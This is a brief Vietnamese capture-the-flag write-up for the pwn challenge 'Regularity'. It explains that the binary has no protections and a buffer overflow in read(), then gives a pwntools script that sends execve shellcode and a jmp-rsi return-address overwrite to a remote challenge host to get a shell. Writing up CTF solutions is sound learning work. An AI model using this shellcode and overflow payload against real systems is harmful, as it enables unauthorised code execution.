Regularity
Table of contents
Cate: Pwn
Description
Challenge cho chúng ta duy nhất file regularity.
Sử dụng lệnh checksec, ta thấy file không có chế độ bảo vệ gì cả.
Sử dụng IDA64 dịch ngược file, nhận thấy có một lỗ hổng tràn bộ đệm to đùng ở hàm read().
Exploit
from pwn import *
p = remote("94.237.56.137", 30190)
context.arch = 'amd64'
shellcode = asm(
f'''
xor rdi, rdi
push rdi
mov rdi, 0x68732f2f6e69622f
push rdi
mov rdi, rsp
xor rdx, rdx
xor rsi, rsi
xor rax, rax
add al, 0x3b
syscall
''')
jmp_rsi = 0x401041
payload = shellcode + b"a" * (256-len(shellcode)) + p64(0x401041)
p.sendline(payload)
p.interactive()